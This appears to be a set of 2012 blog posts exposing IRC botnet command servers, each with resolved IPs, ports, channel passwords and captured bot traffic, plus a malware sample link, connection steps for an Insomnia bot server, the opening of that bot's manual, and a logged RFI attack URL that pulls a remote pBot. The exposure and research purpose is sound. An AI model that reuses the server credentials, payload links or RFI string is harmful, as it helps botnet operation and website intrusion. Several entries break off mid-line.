nbot.no-ip.biz(Aryan Bot hosted in Mexico Television Internacional S.a. De C.v)

Resolved : [nbot.no-ip.biz] To [187.161.215.20]
Remote Host  Port Number
187.161.215.20  6667
Local users: Current Local Users: 74 Max: 115
Global users: Current Global Users: 74 Max: 90
JOIN #bots none
NICK New{US-XP-x86}7358801
USER 7358801 "" "7358801" :7358801
MODE New{US-XP-x86}7358801 +iMm
PONG :4D23E0D9
PONG :nbot.no-ip.biz
Now talking in #bots
Modes On: [ #bots 12] [ +

gigasphere.su(irc botnet hosted in United States Baltimore Gandi Us Inc)

Same hecker Burimi from here http://www.exposedbotnets.com/2012/03/217160224132irc-botnet-hosted-in.html
Resolved : [gigasphere.su] To [61.31.99.67]
Resolved : [gigasphere.su] To [82.165.135.196]
Resolved : [gigasphere.su] To [173.246.102.122]
Remote Host  Port Number
61.31.99.67  4042 PASS ngrBot
61.31.99.67  1863 PASS ngrBot
other ports used for ircd: 81,3333,1234,33333
NICK new[USA|XP|COMPUTERNAME]eejxdfy
USER xd "" "lol" :xd
Channels:
Now talking in #boss
Topic On: [ #boss

fasharlz.com(ngrBot hosted in United States Denver Wbs Connect)

Resolved : [fasharlz.com] To [8.33.7.91]
Remote Host  Port Number
174.140.174.50  80
199.15.234.7  80
62.149.142.23  80
8.33.7.91  8879 PASS secret
NICK n{US|XPa}wjipllb
USER wjipllb 0 0 :wjipllb
JOIN #ircp secret
PRIVMSG #ircp :[d="http://www.lazynews.net/fashashogun.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0
PRIVMSG #ircp :[DNS]: Blocked 0 domain(s) - Redirected 8 domain(s)

anonproducts.info(Loader hosted in Germany Frankfurt Leaseweb Germany Gmbh)

Another post from the same guy here http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html
Samples here: http://www.mediafire.com/?f25869md9bv3q9d password: virus
Control Panel URL: http://anonproducts.info/xx/
Loader.exe is a .NET HTTP bot that connects to global-carding.ru/gate.php. Used for DDoSing and loading malware (mainly RATs). Most files to be installed are loaded from webcamchat4free.in.
Packet captures of it in action: http://www.mediafire.com/?t8obhi8jttvh1l5
Credits to our

we.be.thu.gs(Insomnia bot hosted in Netherlands Amsterdam Ecatel Ltd)

A guy posted in this thread http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html about another Insomnia botnet server; you can read the comments for more.
Resolved : [we.be.thu.gs] To [80.82.79.21]
Bv1’s insomnia bot server
Server we.be.thu.gs
SSL required to connect. Use xchat or install it on mIRC and accept his invalid certificate.
Port 443
Password fuckyou
To connect do this: /server we.be.thu.gs:+443

INSOMNIA IRC Bot v1.1.3 Manual

Insomnia is another IRC bot sold in hecking forums, coded in .NET. I'm posting the manual here so you can see what it does.
INSOMNIA v1.1.3
Table of Contents
1. Summary
2. Core Features
3. Malware Removal
4. SOCKS5
5. DDoS
6. Spreading Modules
7. Topic Generator Explained
8. Complete command list
Summary
Insomnia

noaccess.chaoswow.net(NZM bots hosted in Germany Nuremberg Hetzner Online Ag)

Resolved : [noaccess.chaoswow.net] To [176.9.195.60]
Remote Host  Port Number
noaccess.chaoswow.net  18967
NICK USA|00|XP|SP2|1884237
USER fhfrlaam 0 0 :USA|00|XP|SP2|1884237
USERHOST USA|00|XP|SP2|1884237
MODE USA|00|XP|SP2|1884237 -x+i
JOIN ##&crackr0x#&## 1@$$smoqueed@@
NICK USA|00|XP|SP2|0441020
USER zfoxtlp 0 0 :USA|00|XP|SP2|0441020
USERHOST USA|00|XP|SP2|0441020
MODE USA|00|XP|SP2|0441020 -x+i
NICK USA|00|XP|SP2|5607084
USER ucxoiuauh 0 0 :USA|00|XP|SP2|5607084
USERHOST USA|00|XP|SP2|5607084
MODE USA|00|XP|SP2|5607084 -x+i
NICK USA|00|XP|SP2|5062754
USER oqqeofyr 0

fghfg.translate-google-cache.com(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)

Remote Host  Port Number
fghfg.translate-google-cache.com  5900
other domains: tux.shannen.cc urcdw.zavoddebila.com
NICK [USA][XP-SP2]669217
USER VirUs "" "lol" :My_Name_iS_PIG_and_Iam_A_GaY2742
JOIN ##Turb0-37##
NICK [USA][XP-SP2]062388
USER VirUs "" "lol" :My_Name_iS_PIG_and_Iam_A_GaY7011
NICK {NOVA}[USA][XP-SP2]750366
USER VirUs "" "lol" :My_Name_iS_PIG_and_Iam_A_GaY0938
hosting infos: http://whois.domaintools.com/61.31.99.67

Irc.javairc.org(Turkish noobs scanning for RFI)

I was looking for online users in my vBulletin site and I saw this:
/threads//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://95.154.24.14:32000//accounts/inc/admin/apache.jpg
I downloaded apache.jpg and I found that it is a lame pBot directing to irc.javairc.org.
Here http://95.154.24.14:32000//accounts/ I found the lamer behind all this: -=[ HackeD by PasteL ]=-
Here is the channel used for the RFI scan:
Now talking in